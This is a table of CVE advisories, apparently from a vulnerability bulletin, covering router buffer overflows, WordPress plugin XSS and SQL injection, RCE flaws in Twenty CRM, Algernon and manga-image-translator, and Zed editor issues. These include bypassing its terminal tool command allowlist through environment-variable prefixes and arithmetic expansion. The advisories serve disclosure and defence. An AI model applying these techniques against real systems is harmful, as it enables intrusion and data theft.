| TRENDnet--TEW-432BRP | A vulnerability was found in TRENDnet TEW-432BRP 3.10B20. The affected element is the function formSysCmd of the file /goform/formSysCmd. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10181 |
| TRENDnet--TEW-432BRP | A vulnerability was identified in TRENDnet TEW-432BRP 3.10B20. This affects the function formWlanSetup of the file /goform/formWlanSetup. The manipulation of the argument enrollee leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10183 |
| twentyhq--twenty | Twenty is an open source CRM. From 1.7.7 through 1.16.7, a critical Remote Code Execution (RCE) vulnerability exists in Twenty CRM via a chained SQL Injection and PostgreSQL COPY TO PROGRAM attack. If the Postgres user is a superuser, then any authenticated user can execute arbitrary OS commands on the database server by injecting SQL through the unsanitized timeZone parameter in the REST API groupBy endpoint. The timeZone field within the group_by query parameter is directly interpolated into a raw SQL expression using JavaScript template literals without any parameterization, validation, or escaping. This affects engine/api/graphql/graphql-query-runner/group-by/resolvers/utils/get-group-by-expression.util.ts. | 2026-05-26 | 9.9 | CVE-2026-46624 |
| twentyhq--twenty | Twenty is an open source CRM. In 1.18.0 and earlier, the file serving endpoints in Twenty CRM at /files/* and /file/:fileFolder/:id serve uploaded files using fileStream.pipe(res) without setting any Content-Type, Content-Disposition, or X-Content-Type-Options response headers. This allows an authenticated attacker to upload an HTML file containing JavaScript, which will be rendered by the victim's browser in the context of the Twenty CRM domain when accessed - enabling session hijacking, account takeover, and data theft. | 2026-05-26 | 8.7 | CVE-2026-44729 |
| uniget-org--cli | uniget is a universal installer and updater for (container) tools. Prior to 0.27.1, a command injection vulnerability exists in uniget due to unsafe execution of the check field from metadata files using /bin/bash -c. Because the check field is loaded directly from untrusted JSON metadata without validation or sanitization, an attacker can craft malicious metadata that executes arbitrary shell commands on the victim's system when common uniget operations such as describe, install, update, or inspect are performed. This vulnerability can lead to arbitrary code execution with the privileges of the user running uniget. This vulnerability is fixed in 0.27.1. | 2026-05-27 | 7.8 | CVE-2026-45152 |
| Unlimited Elements--Unlimited Elements For Elementor | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Unlimited Elements For Elementor allows Blind SQL Injection. This issue affects Unlimited Elements For Elementor: from n/a through 2.0.8. | 2026-05-25 | 8.5 | CVE-2026-48837 |
| Usagi-org--ai-goofish-monitor | Usagi-org ai-goofish-monitor contains an unauthenticated arbitrary file read vulnerability in the GET /api/prompts/(unknown) endpoint on Windows deployments that allows unauthenticated remote attackers to read arbitrary files by supplying absolute Windows paths or backslash-based traversal sequences. Attackers can bypass the incomplete path traversal guard, which only blocks forward slashes and '..', by providing absolute paths such as Windows system file locations, causing os.path.join to discard the intended prompts directory prefix and expose files accessible to the application process. | 2026-05-28 | 7.5 | CVE-2026-10044 |
| UTT--HiPER 1200GW | A security flaw has been discovered in UTT HiPER 1200GW up to 2.5.3-170306. This impacts the function strcpy of the file /goform/setSysAdm of the component Web Management Interface. The manipulation of the argument sysAdmUser/sysAdmPass results in buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-27 | 8.8 | CVE-2026-9627 |
| UTT--HiPER 1200GW | A weakness has been identified in UTT HiPER 1200GW up to 2.5.3-170306. Affected is an unknown function of the file /goform/formPptpClientConfig of the component Web Management Interface. This manipulation of the argument PPTP server address/username/password/tunnel name causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-27 | 8.8 | CVE-2026-9628 |
| UTT--HiPER 1250GW | A vulnerability was detected in UTT HiPER 1250GW up to 3.2.7-210907-180535. Affected by this vulnerability is the function strcpy of the file /goform/formConfigFastDirectionW of the component Web Management Interface. Performing a manipulation of the argument Profile results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-05-27 | 8.8 | CVE-2026-9631 |
| UTT--HiPER 1250GW | A flaw has been found in UTT HiPER 1250GW up to 3.2.7-210907-180535. Affected by this issue is the function strcpy of the file /goform/formGroupConfig of the component Web Management Interface. Executing a manipulation of the argument Profile can lead to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-05-27 | 8.8 | CVE-2026-9632 |
| verbb--formie | Formie is a Craft CMS plugin for creating forms. Prior to 2.2.20 and 3.1.24, unauthenticated users could submit crafted values into Hidden fields (with Default value → Custom) that were evaluated as Twig during submission handling, which could lead to serious compromise of the Craft site (depending on template/sandbox behavior). This vulnerability is fixed in 2.2.20 and 3.1.24. | 2026-05-29 | 9.8 | CVE-2026-45697 |
| veronalabs--SlimStat Analytics | The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'User-Agent' header in all versions up to, and including, 5.4.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The show_complete_user_agent_tooltip setting must be explicitly enabled by an administrator (disabled by default) for the stored payload to be rendered and executed. | 2026-05-28 | 7.2 | CVE-2026-7634 |
| VideoWhisper.com--Broadcast Live Video | Improper Control of Generation of Code ('Code Injection') vulnerability in VideoWhisper.Com Broadcast Live Video allows Code Injection. This issue affects Broadcast Live Video: from n/a before 7.1.3. | 2026-05-25 | 7.2 | CVE-2026-24937 |
| WC Lovers--WCFM Membership | Missing Authorization vulnerability in WC Lovers WCFM Membership wc-multivendor-membership allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WCFM Membership: from n/a through <= 2.11.10. | 2026-05-27 | 7.3 | CVE-2026-42753 |
| WebPros--Comet Backup | Insufficient character filtering in the backup agent signing module on Comet Backup server allows an authenticated tenant administrator to execute arbitrary code on behalf of a privileged user on the affected server and connected devices. | 2026-05-28 | 9.1 | CVE-2026-32999 |
| WebPros--Plesk | Plesk contains an XPath injection vulnerability in the APS Application Catalog search functionality, where user-supplied input is interpolated into XPath queries without proper sanitization. This allows an authenticated, low-privileged user to execute arbitrary operating system commands on the server, resulting in local privilege escalation. | 2026-05-29 | 10 | CVE-2026-44962 |
| WebToffee--Smart Coupons for WooCommerce | Missing Authorization vulnerability in WebToffee Smart Coupons for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Smart Coupons for WooCommerce: from n/a before 2.3.0. | 2026-05-25 | 7.5 | CVE-2026-45438 |
| Winmtr--WinMTR | WinMTR 0.91 contains a denial of service vulnerability that allows attackers to crash the application by sending a malformed payload file containing a large buffer of repeated characters. Attackers can create a specially crafted input file with 238 bytes of data to trigger a buffer overflow condition that causes the application to crash. | 2026-05-30 | 7.5 | CVE-2018-25426 |
| wordplus--BP Better Messages | Authorization Bypass Through User-Controlled Key vulnerability in wordplus BP Better Messages bp-better-messages allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BP Better Messages: from n/a through <= 2.14.16. | 2026-05-27 | 7.5 | CVE-2026-42736 |
| WPify--WPify Woo Czech | Unrestricted Upload of File with Dangerous Type vulnerability in WPify WPify Woo Czech wpify-woo allows Upload a Web Shell to a Web Server. This issue affects WPify Woo Czech: from n/a through <= 5.4.1. | 2026-05-27 | 9.9 | CVE-2026-42748 |
| WPTravel--WP Travel Pro | The WP Travel Pro plugin for WordPress is vulnerable to arbitrary user deletion via the /wp-json/wp-travel/v1/travel-guide/{user_id} REST API endpoint in all versions up to, and including, 10.6.0. This is due to the check_permission() callback unconditionally returning true and the Database::delete() method passing the user ID directly to wp_delete_user() without any role validation. This makes it possible for unauthenticated attackers to delete arbitrary user accounts, including those of administrators. | 2026-05-29 | 9.1 | CVE-2026-4290 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, there is a classic shell-metacharacter injection. The YPTSocket notification branch in plugin/Live/on_publish.php builds an execAsync() command line by string concatenation, single-quoting each argument but never calling escapeshellarg(). A ' in any of the three interpolated values ($users_id, $m3u8, $obj->liveTransmitionHistory_id) closes the quoted token and lets the attacker append arbitrary commands. | 2026-05-29 | 8.8 | CVE-2026-45578 |
| xddxdd--bird-lg-go | bird-lg-go is a BIRD looking glass in Go. Prior to 1.4.5, the apiHandler (and similarly webHandlerTelegramBot) processes user-provided JSON payloads by directly using json.NewDecoder(r.Body).Decode(&request) without restricting the maximum read size. An unauthenticated remote attacker can stream an extremely large, endless JSON payload (e.g., several Gigabytes of padding) over a single TCP connection. Because Go's JSON decoder attempts to allocate memory for the entire parsed structure, this rapidly exhausts the host's physical RAM or container limits, leading to an unrecoverable fatal error: runtime: out of memory. This vulnerability is fixed in 1.4.5. | 2026-05-27 | 7.5 | CVE-2026-45047 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, when Algernon is asked for any URL path that resolves to a directory without an index file, DirPage walks upward through parent directories - past the configured server root - looking for a file named handler.lua to execute as the request handler. The loop terminates only after 100 ancestor steps or when filepath.Dir returns ., so on any absolute server-root path the search reaches the filesystem root (/ on Unix, drive letter on Windows). The first handler.lua it finds is loaded into the Lua interpreter with the full Algernon API exposed - including run3(), httpclient, os.execute, io.popen, PQ, MSSQL, raw filesystem access, and the userstate database. Any process that can write handler.lua anywhere in a parent directory of the server root obtains pre-authenticated remote code execution on the next HTTP request. This is reachable without authentication - the lookup happens before the permission check returns a hit (the perm system only gates URL prefixes, not the handler-resolution step), and any URL pointing at a directory without an index triggers the walk. On a fresh stock Algernon install the request GET / is enough. This vulnerability is fixed in 1.17.7. | 2026-05-26 | 9 | CVE-2026-45721 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.8, when algernon is started with --domain (or --letsencrypt, which silently turns on --domain at engine/flags.go:372), the request handler resolves the served directory by joining the configured --dir with the value of the client-supplied Host header. The join is performed by filepath.Join with no validation, so a Host: .. header walks one level above the document root. Subsequent file resolution then exposes everything in that parent directory - arbitrary file read, full directory listing, and, if any .lua file is present, server-side Lua execution. This vulnerability is fixed in 1.17.8. | 2026-05-26 | 8.2 | CVE-2026-48126 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, when Algernon is invoked with a single file path instead of a directory, singleFileMode is set to true and debugMode is forcibly enabled. debugMode activates the PrettyError renderer, which on any Lua or template error response dumps the absolute path of the file that errored, complete byte contents of that file, and exception or parser error text. This response is served with HTTP 200 OK to whoever sent the request that triggered the error. Any client able to reach the server and able to provoke a runtime error in the served script obtains the full server-side source of that script and of any sibling Lua data file consulted during the request. This vulnerability is fixed in 1.17.7. | 2026-05-26 | 7.5 | CVE-2026-45728 |
| yashpokharna2555--StudentManagementSystem | A weakness has been identified in yashpokharna2555 StudentManagementSystem cb2f558ddf8d19396de0f92abf2d224d46a0a203. The impacted element is an unknown function of the file /success.php. This manipulation of the argument User causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 7.3 | CVE-2026-9469 |
| yashpokharna2555--StudentManagementSystem | A security vulnerability has been detected in yashpokharna2555 StudentManagementSystem cb2f558ddf8d19396de0f92abf2d224d46a0a203. This affects the function confirm_logged_in of the file student_trans.php. Such manipulation of the argument FIRST_NAME/Last_Name/EMAIL leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 7.3 | CVE-2026-9470 |
| yashpokharna2555--StudentManagementSystem | A vulnerability was found in yashpokharna2555 StudentManagementSystem up to cb2f558ddf8d19396de0f92abf2d224d46a0a203. Affected by this issue is the function confirm_logged_in of the file /studentdel.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 7.3 | CVE-2026-9474 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.44.0, when cpp-httplib's server parses an incoming request, it applies percent-decoding to every header value except Location and Referer. The validity check (is_field_value) is run before decoding, so encoded %0D%0A passes the check and is then expanded to a literal \r\n byte pair inside the stored header value. This vulnerability is fixed in 0.44.0. | 2026-05-29 | 9.9 | CVE-2026-45372 |
| Yot--Yot CMS | Yot CMS 3.3.1 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the aid and cid parameters. Attackers can send GET requests to index.php with crafted SQL payloads in the aid or cid parameters to extract database information including table and column names. | 2026-05-30 | 8.2 | CVE-2018-25425 |
| yudiz--WP Contact Form 7 DB Handler | The WP Contact Form 7 DB Handler plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Arbitrary File Deletion via SQL Injection and PHP Object Injection in versions up to and including 3.0. This is due to a missing nonce verification in the process_bulk_action() function, the nonce check is only executed when _wpnonce is present in the POST body, allowing it to be trivially bypassed by omitting the field, combined with the use of an unsanitized, unparameterized user-supplied value in a numeric SQL context (WHERE ID = $ID) and the unsafe deserialization of the query result's post_content field. An attacker can craft a CSRF page that tricks a logged-in administrator into triggering a UNION-based SQL injection payload (using CHAR() to avoid esc_sql quote-escaping) that returns a malicious serialized PHP array as post_content; upon deserialization, array values associated with keys containing 'ys_cfdbh_file' are used as file paths appended to the uploads directory path without any path traversal validation, and then passed to wp_delete_file(), allowing the attacker to delete arbitrary files on the server (e.g., wp-config.php, system files). | 2026-05-28 | 8.1 | CVE-2026-6455 |
| ZAYTECH--Smart Online Order for Clover | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Stored XSS. This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0. | 2026-05-27 | 7.1 | CVE-2026-42738 |
| ZAYTECH--Smart Online Order for Clover | Authentication Bypass Using an Alternate Path or Channel vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Authentication Bypass. This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0. | 2026-05-27 | 7.3 | CVE-2026-42745 |
| ZAYTECH--Smart Online Order for Clover | Insertion of Sensitive Information Into Sent Data vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Retrieve Embedded Sensitive Data. This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0. | 2026-05-27 | 7.3 | CVE-2026-42746 |
| zed-industries--zed | Zed is a code editor. Prior to 0.227.1, Zed builds SSH/WSL remote commands as a shell command string that starts with exec env ..., but environment variable keys are inserted without shell quoting or validation. If an attacker can control an environment variable key (for example via project terminal settings), shell expansions in the key (such as $(...)) are evaluated by the remote shell when a terminal is opened. This can lead to arbitrary command execution on the remote host under the victim user's account. This vulnerability is fixed in 0.227.1. | 2026-05-28 | 8.6 | CVE-2026-44461 |
| zed-industries--zed | Zed is a code editor. Prior to 0.229.0, Zed's terminal tool permission system can be bypassed by prepending environment variable assignments to allowlisted commands, hijacking program behavior (e.g., PAGER) to execute arbitrary code. This vulnerability is fixed in 0.229.0. | 2026-05-28 | 8.6 | CVE-2026-44463 |
| zed-industries--zed | Zed is a code editor. Prior to 0.227.1, Zed IDE executes arbitrary commands when opening a folder with a malicious .git/config file that abuses the core.fsmonitor Git configuration option. This allows an attacker to achieve Remote Code Execution (RCE) when a victim opens a folder in untrusted mode. This vulnerability is fixed in 0.227.1. | 2026-05-28 | 8.6 | CVE-2026-44465 |
| zed-industries--zed | Zed is a code editor. Prior to 0.229.0, Zed's terminal tool permission system can be bypassed via bash arithmetic expansion $((...)), allowing execution of arbitrary commands nested inside an allowlisted command like echo. This vulnerability is fixed in 0.229.0. | 2026-05-28 | 8.6 | CVE-2026-44466 |
| ZTE--ZXUniPOS NDS-LTE | Access control failure means that an application does not effectively check user access permissions, so that unauthorized users can access system data beyond their permissions, such as viewing and modifying configuration information. | 2026-05-27 | 9.1 | CVE-2026-49002 |
| ZTE--ZXUniPOS NDS-LTE | An insecure password scheme refers to vulnerabilities arising from improper selection of encryption algorithms, inadequate key management, or flawed code implementation, which may lead to data leakage or tampering, such as hard-coded keys or the use of weak encryption algorithms. | 2026-05-27 | 7 | CVE-2026-49000 |
| zyddnys--manga-image-translator | manga-image-translator contains a remote code execution vulnerability in the shared API server mode due to unsafe deserialization of untrusted pickle data in the share.py module, where the /execute/{method_name} and /simple_execute/{method_name} endpoints deserialize attacker-controlled HTTP request bodies using pickle.loads(). A remote attacker can supply a crafted pickle payload to these endpoints to execute arbitrary code in the server process, resulting in full container compromise when running in the default Docker deployment as root. | 2026-05-29 | 9.8 | CVE-2026-10042 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 10web--Photo Gallery by 10Web Mobile-Friendly Image Gallery | The Photo Gallery by 10Web - Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'order_by' parameter in all versions up to, and including, 1.8.40 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is exploitable by embedding a malicious shortcode in a post or draft, allowing the injected SQL to execute when the shortcode is rendered. | 2026-05-28 | 6.5 | CVE-2026-7048 |
| 3clyp50--agent-zero | Agent Zero before version 1.15 contains a path traversal vulnerability that allows unauthenticated attackers to read arbitrary files by supplying crafted paths to the image file serving endpoint, which relies solely on an extension allowlist while the path containment check is explicitly disabled. Attackers can request any file with an image extension readable by the process, including files outside the agent workspace, user home directories, and mounted volumes, and can also leverage symlink-based escapes due to the lack of path canonicalization in the path resolution logic. | 2026-05-27 | 6.5 | CVE-2026-47118 |
| 3clyp50--agent-zero | Agent Zero before version 1.15 contains a stored cross-site scripting vulnerability that allows attackers to execute arbitrary JavaScript in the application origin by serving SVG files through the image_get API endpoint without Content-Security-Policy, X-Content-Type-Options, or Content-Disposition headers. Attackers can place a crafted SVG file containing script tags in any path readable by the agent-zero process and lure an authenticated user to the image_get endpoint, causing the browser to execute the malicious script, steal the csrf_token cookie, and perform unauthorized API calls on behalf of the victim. | 2026-05-27 | 6.1 | CVE-2026-47119 |
| 3uu--Shariff Wrapper | The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'headline' parameter in the [shariff] shortcode in all versions up to, and including, 4.6.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability occurs because the plugin uses a custom wp_kses implementation with permissive allowed HTML tags, and then performs a str_replace operation that injects HTML after sanitization, allowing event handlers to be introduced through the %total placeholder in the style attribute. | 2026-05-28 | 6.4 | CVE-2026-4334 |
| a3rev--a3 Lazy Load | The a3 Lazy Load plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.7.6. This is due to a regex bug in the _filter_videos() method that breaks HTML attribute quoting when processing crafted <video> elements, combined with unescaped output in the admin/views/form-data.php template. An authenticated attacker with Contributor-level access can insert a crafted <video> tag whose src attribute contains an embedded class=" substring that tricks the plugin's class-replacement regex into consuming an attribute-value closing quote. This shifts the HTML5 parser's quote boundary, promoting attacker-controlled text from inside a quoted attribute value into standalone event-handler attributes (autofocus, onfocus). The injected script executes in the browser of any user (including administrators) who views the post. | 2026-05-28 | 6.4 | CVE-2026-6427 |
| adamhathcock--sharpcompress | SharpCompress is a fully managed C# library to deal with many compression types and formats. In 0.47.4 and earlier, a path traversal vulnerability in IArchive.WriteToDirectory() allows a malicious archive to create directories outside the intended extraction root. For TAR archives, this can be escalated to arbitrary file writes by chaining with a symlink entry, giving a full write primitive on the target filesystem subject to the permissions of the running process. | 2026-05-26 | 5.9 | CVE-2026-44788 |
| Admidio--Admidio | Admidio 3.3.5 contains a cross-site request forgery vulnerability that allows low-privilege users to increase their permissions by exploiting improper origin checking. Attackers can craft malicious HTML forms targeting roles_function.php with parameters like rol_assign_roles, rol_approve_users, and rol_edit_user set to 1 to escalate privileges without authentication. | 2026-05-25 | 5.3 | CVE-2018-25370 |
| adnanmoqsood--Team Master A Modern WordPress Team Showcase | The Team Master - A Modern WordPress Team Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8870 |
| Ads by WPQuads--Ads by WPQuads | Improper Validation of Specified Quantity in Input vulnerability in Ads by WPQuads Ads by WPQuads quick-adsense-reloaded allows Input Data Manipulation. This issue affects Ads by WPQuads: from n/a through <= 3.0.2. | 2026-05-27 | 6.5 | CVE-2026-42732 |
| Ads by WPQuads--Ads by WPQuads | Improper Validation of Specified Quantity in Input vulnerability in Ads by WPQuads Ads by WPQuads quick-adsense-reloaded allows Manipulating Hidden Fields. This issue affects Ads by WPQuads: from n/a through <= 3.0.2. | 2026-05-27 | 6.5 | CVE-2026-42744 |
| Aider-AI--Aider | A vulnerability was identified in Aider-AI Aider 0.86.3. Affected is an unknown function of the file aider/args.py in the Pre-commit Hook Handler component. Manipulation of the git-commit-verify argument leads to a protection mechanism failure. The attack may be launched remotely. A public exploit exists and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10174 |
| Aider-AI--Aider | A security flaw has been discovered in Aider-AI Aider 0.86.3. Affected is the function editor_coder.run of the file auth.py in the Architect Mode component. Manipulation of its input results in code injection. Remote exploitation is possible. A public exploit exists and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10175 |
| Aider-AI--Aider | A weakness has been identified in Aider-AI Aider 0.86.3. Affected is unspecified functionality of the Code Generation Workflow component. Manipulation of its input can lead to SQL injection. The attack can be executed remotely. A public exploit exists and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10176 |
| Aider-AI--Aider | A security vulnerability has been detected in Aider-AI Aider 0.86.3. This affects the function requests.get of the file api_docs.py in the AWS EC2 Metadata Endpoint component. The manipulation leads to server-side request forgery. The attack can be carried out remotely. A public exploit exists and may be used. Installing the patch is recommended; the pull request that fixes this issue awaits acceptance. | 2026-05-31 | 6.3 | CVE-2026-10177 |
| analogwp--Style Kits for Elementor | The Style Kits - Advanced Theme Styles for Elementor, Elementor Kits & Elementor Patterns plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '/wp-json/agwp/v1/tokens/save' endpoint kit title parameter in versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping in an admin attribute context. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-6565 |
| Armcode--Arm Whois | Arm Whois 3.11 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized input string. Attackers can paste a malicious buffer of 700 bytes into the IP address or domain input field to trigger a denial of service condition. | 2026-05-30 | 6.2 | CVE-2018-25423 |
| Assimp--Assimp | A vulnerability was found in Assimp up to 6.0.4. This affects the function glTFCommon::CopyValue in the library glTFCommon.h of the 4x4 Matrix Parser component. Manipulation of its input results in a heap-based buffer overflow. The attack requires local access. A public exploit exists and could be used. The project tagged the reported issue as a bug. | 2026-05-31 | 5.3 | CVE-2026-10200 |
| authlib--authlib | Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to 1.6.12 and 1.7.1, an unauthenticated open redirect in Authlib's OpenIDImplicitGrant and OpenIDHybridGrant authorization endpoint lets a remote attacker cause the authorization server to issue an HTTP 302 to an attacker-chosen URL by submitting an authorization request that omits the openid scope. This vulnerability is fixed in 1.6.12 and 1.7.1. | 2026-05-27 | 6.1 | CVE-2026-44681 |
| Autodesk--3ds Max | A maliciously crafted PAR file, when parsed through Autodesk 3ds Max, can force a NULL Pointer Dereference vulnerability. Successful exploitation may cause the application to crash, leading to a denial-of-service condition. | 2026-05-26 | 5.3 | CVE-2026-7450 |
| Autodesk--3ds Max | A maliciously crafted WRL file, when parsed through Autodesk 3ds Max, can cause a Stack Exhaustion vulnerability, leading to a denial-of-service condition. | 2026-05-26 | 5.3 | CVE-2026-7453 |
| Averta--Master Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Averta Master Slider allows DOM-Based XSS. This issue affects Master Slider: from n/a through 3.10.8. | 2026-05-27 | 6.5 | CVE-2026-48968 |
| ays-pro--Poll Maker by AYS Versus Polls, Anonymous Polls, Image Polls | The Poll Maker - Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to and including 6.3.7. This is due to insufficient access controls on the 'ays_poll_get_user_information' AJAX action, which serializes and returns the complete WP_User object - including the user_pass (bcrypt password hash), user_email, user_login, user_registered, roles, and all capabilities - without any nonce verification or capability check beyond is_user_logged_in(). This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive account data including their own password hash, which WordPress does not expose through any of its standard interfaces and which can be leveraged for offline password-cracking attacks. | 2026-05-29 | 4.3 | CVE-2026-8995 |
| BankPro E-Service Technology--Service Center | Service Center developed by BankPro E-Service Technology has an Insecure Direct Object Reference vulnerability, allowing authenticated remote attackers to modify the parameter of a specific query function to access other users' EC order details. | 2026-05-29 | 6.5 | CVE-2026-9493 |
| Bdtask--Multi-Store Inventory Management System | A security flaw has been discovered in Bdtask Multi-Store Inventory Management System 1.0. The affected element is the function Upload of the file application/modules/dashboard/controllers/Module.php of the component Component Module. The manipulation of the argument module results in unrestricted upload. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. | 2026-05-31 | 6.3 | CVE-2026-10172 |
| Bdtask--Multi-Store Inventory Management System | A vulnerability was found in Bdtask Multi-Store Inventory Management System 1.0. The impacted element is the function accounts_report_search of the file application/modules/accounts/controllers/Accounts.php of the component Accounts Report Handler. Performing a manipulation of the argument dtpToDate results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2026-05-30 | 4.7 | CVE-2026-10155 |
| Benbodhi--SVG Support | Missing Authorization vulnerability in Benbodhi SVG Support allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SVG Support: from n/a through 2.5.14. | 2026-05-27 | 4.3 | CVE-2026-48973 |
| bensibley--Independent Analytics WordPress Analytics Plugin | The Independent Analytics plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.14.9. This is due to a public tracking route at /wp-json/iawp/search that accepts attacker-controlled referrer_url values when the signature matches, combined with a scheduled favicon fetcher that performs unrestricted cURL requests to stored domains. The signature validation is insufficient because the signature is embedded in publicly-accessible JavaScript and the salt is static per site, allowing attackers to extract valid signatures. The favicon downloader uses raw cURL functions without any SSRF protection mechanisms (no localhost blocking, no private network filtering, and does not use WordPress's wp_safe_remote_* functions). This makes it possible for unauthenticated attackers to inject malicious referrer domains into the database and trigger server-side requests to arbitrary hosts including internal services. | 2026-05-28 | 6.5 | CVE-2026-5737 |
| bitform--BitForm Data management solution for WordPress | The BitForm plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bitform' shortcode in versions up to, and including, 1.1.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes ('width' and 'height') in the Shortcode::shortcode() function, which are interpolated directly into the 'style' attribute of an <iframe> element. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8891 |
| Bizswoop--Account Manager for WooCommerce | Missing Authorization vulnerability in Bizswoop Account Manager for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Account Manager for WooCommerce: from n/a through 2.1.2. | 2026-05-27 | 4.3 | CVE-2022-41656 |
| blitz-js--blitz | A weakness has been identified in blitz-js blitz up to 3.0.2 on GitHub. This impacts an unknown function of the file packages/generator/templates/app/src/app/auth/components/LoginForm.tsx of the component Sign-in. This manipulation of the argument Next causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 4.3 | CVE-2026-9520 |
| bPlugins--Tiktok Feed | Missing Authorization vulnerability in bPlugins Tiktok Feed allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tiktok Feed: from n/a through 1.0.24. | 2026-05-26 | 4.3 | CVE-2026-24520 |
| bradyholt--jQuery googleslides | The jQuery googleslides plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'googleslides' shortcode in all versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping on user supplied attributes (userid, albumid, authkey, imgmax, maxresults, random, caption, albumlink, time, and fadespeed) in the googleslides_handler() function, which interpolates the attribute values directly into single-quoted HTML attributes without using esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8866 |
